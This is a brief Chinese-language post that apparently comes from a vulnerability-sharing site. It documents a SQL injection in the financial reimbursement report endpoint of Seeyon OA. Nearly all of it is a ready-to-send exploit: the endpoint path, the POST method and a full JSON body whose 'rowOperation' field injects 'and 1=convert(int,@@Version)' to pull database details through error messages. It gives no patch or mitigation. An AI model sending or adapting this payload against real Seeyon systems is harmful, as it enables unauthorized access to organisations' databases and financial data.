致远OA 后台财务报销SQL注入漏洞

http://xxxxxxx.com/seeyon/rest/cap4/report/query/1025021447185452080/1

POST

{"platform":"1","op":"default","userConditions":[{"aliasTableName":"formmain_0254_0","fieldName":"","fieldValue":"1","leftChar":"(","operation":"Like","rightChar":")","rowOperation":"and 1=convert(int,@@Version) and ","fieldType":"VARCHAR","inputType":"text"},{"aliasTableName":"formmain_0254_0","fieldName":"","fieldValue":"1","leftChar":"(","operation":"Like","rightChar":")","rowOperation":"and","fieldType":"VARCHAR","inputType":"text"},{"aliasTableName":"formmain_0254_0","fieldName":"","fieldValue":["Member|-"],"leftChar":"(","operation":"Equal","rightChar":")","rowOperation":"and","fieldType":"VARCHAR","inputType":"member"},{"aliasTableName":"formmain_0254_0","fieldName":"","fieldValue":[{"id":"","name":"已报销","value":"0"},{"id":"","name":"未报销","value":"1"},{"id":"","name":"","value":""}],"leftChar":"(","operation":"Equal","rightChar":")","rowOperation":"or","fieldType":"DECIMAL","inputType":"select"}],"customOrderFields":[],"pagination":{"page":1,"pageSize":50}}

感谢您的来访，获取更多精彩文章请收藏本站。